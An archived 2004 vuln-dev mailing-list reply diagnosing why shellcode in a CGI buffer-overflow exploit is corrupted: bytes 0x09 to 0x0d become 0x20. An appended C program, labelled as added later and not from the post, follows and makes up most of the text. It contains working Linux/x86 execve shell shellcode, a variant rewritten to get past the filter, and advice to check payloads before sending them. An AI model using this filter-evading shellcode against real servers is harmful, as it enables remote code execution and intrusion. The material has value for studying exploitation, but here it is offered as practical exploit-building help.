Vulnerability Development: Re: Problem exploiting a CGI overflow


From: Marco Ivaldi <raptor_at_0xdeadbeef.info>
Date: Wed, 24 Nov 2004 12:14:55 +0100 (CET)

> I discovered that the shellcode changes during its execution. Yeah, some
> bytes of the shellcode change while it is running. Why?? How can I avoid
> this?

The problem here is that some bytes in the shellcode are converted into
0x20. Namely, 0x0b (execve syscall number) is converted into 0x20 (gtty
syscall number -- an unimplemented syscall), screwing up the execution of
your shell.

$ strace ./post2 <buffer
[...]
read(0, "", 4096) = 0
gtty(0xbffff7ec, 0xbffff7f4) = -1 ENOSYS (Function not implemented)
_exit(0) = ?

The following special bytes pose similar problems: 0x09 ('\t'), 0x0a
('\n'), 0x0c ('\f') and 0x0d ('\r'). You should try to exploit the cgi
with a special shellcode (note that you may also need to close stdin and
re-open the tty -- see http://www.0xdeadbeef.info/code/gets-linux.c).

Since I suppose you want to build a remote exploit, ret-into-envp is useless
here (i.e. you can't stick your shellcode into the environment). Moreover,
I don't think chained ret-into-libc may be feasible...

I don't have enough time to play with that any further, but I hope you'll
be able to find a viable solution ;)

Cheers,

-- 
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
Received on Nov 24 2004
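The byte-mangling described in the reply above (0x09, 0x0a, 0x0b, 0x0c and 0x0d rewritten to 0x20 before the overflow is reached) is easy to model statically, and doing so is the quickest way to check a payload before wasting time in strace. The following C program is an added example, not code from the post or from its author: it models the filter as the post describes it, reports which bytes of the classic Linux/x86 execve("/bin//sh") shellcode would be corrupted (the 0x0b syscall number, which becomes 0x20, the gtty syscall number the strace output shows), and checks a variant that loads 0x0b arithmetically so no byte in the 0x09..0x0d range appears. The arithmetic encoding (`mov al, 6; add al, 5`) is my own choice for the example; the post does not prescribe one. Nothing here executes the shellcode.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/*
 * Added example (not from the original post): a static check for whether a
 * shellcode survives the whitespace mangling the post describes, where the
 * CGI turns 0x09, 0x0a, 0x0b, 0x0c and 0x0d into 0x20 before the overflow.
 * The shellcode is only inspected, never executed.
 */

/* The five bytes the post says get rewritten to a space (0x20). */
static int is_mangled(unsigned char b)
{
    return b >= 0x09 && b <= 0x0d;
}

/* Model of the CGI's input handling: copies n bytes from in to out,
 * replacing each mangled byte with 0x20. Returns how many bytes changed. */
size_t cgi_filter(const unsigned char *in, unsigned char *out, size_t n)
{
    size_t changed = 0;
    for (size_t i = 0; i < n; i++) {
        if (is_mangled(in[i])) {
            out[i] = 0x20;
            changed++;
        } else {
            out[i] = in[i];
        }
    }
    return changed;
}

/* Prints each byte the filter would corrupt and returns the count. */
size_t report_bad_bytes(const unsigned char *sc, size_t n, const char *name)
{
    size_t bad = 0;
    for (size_t i = 0; i < n; i++) {
        if (is_mangled(sc[i])) {
            printf("%s: offset %zu byte 0x%02x would become 0x20\n",
                   name, i, sc[i]);
            bad++;
        }
    }
    return bad;
}

/* Classic Linux/x86 execve("/bin//sh") shellcode, 24 bytes. The syscall
 * number is loaded with "mov al, 0x0b" (b0 0b), so 0x0b sits at offset 21. */
const unsigned char sc_classic[] = {
    0x31, 0xc0,                         /* xor  eax, eax            */
    0x50,                               /* push eax                 */
    0x68, 0x2f, 0x2f, 0x73, 0x68,       /* push "//sh"              */
    0x68, 0x2f, 0x62, 0x69, 0x6e,       /* push "/bin"              */
    0x89, 0xe3,                         /* mov  ebx, esp            */
    0x50,                               /* push eax                 */
    0x53,                               /* push ebx                 */
    0x89, 0xe1,                         /* mov  ecx, esp            */
    0x99,                               /* cdq                      */
    0xb0, 0x0b,                         /* mov  al, 0x0b  (mangled) */
    0xcd, 0x80                          /* int  0x80                */
};

/* Same payload with 0x0b built as 6 + 5 so that no byte in 0x09..0x0d
 * appears. This encoding is the example's own choice, not the post's. */
const unsigned char sc_safe[] = {
    0x31, 0xc0, 0x50,
    0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e,
    0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0x99,
    0xb0, 0x06,                         /* mov  al, 6               */
    0x04, 0x05,                         /* add  al, 5   -> al=0x0b  */
    0xcd, 0x80                          /* int  0x80                */
};

int main(void)
{
    unsigned char out[64];
    size_t n;

    report_bad_bytes(sc_classic, sizeof sc_classic, "classic");
    n = cgi_filter(sc_classic, out, sizeof sc_classic);
    printf("classic: %zu byte(s) changed, syscall byte now 0x%02x\n",
           n, out[21]);

    report_bad_bytes(sc_safe, sizeof sc_safe, "safe");
    n = cgi_filter(sc_safe, out, sizeof sc_safe);
    printf("safe: %zu byte(s) changed, identical=%d\n", n,
           memcmp(out, sc_safe, sizeof sc_safe) == 0);
    return 0;
}
```

Run it once against any candidate payload before sending it: a non-zero count from report_bad_bytes means the byte will not arrive intact, which is exactly the symptom the original poster observed. The same check applies to the return address and any NOP sled bytes you place in the buffer, not just the shellcode body.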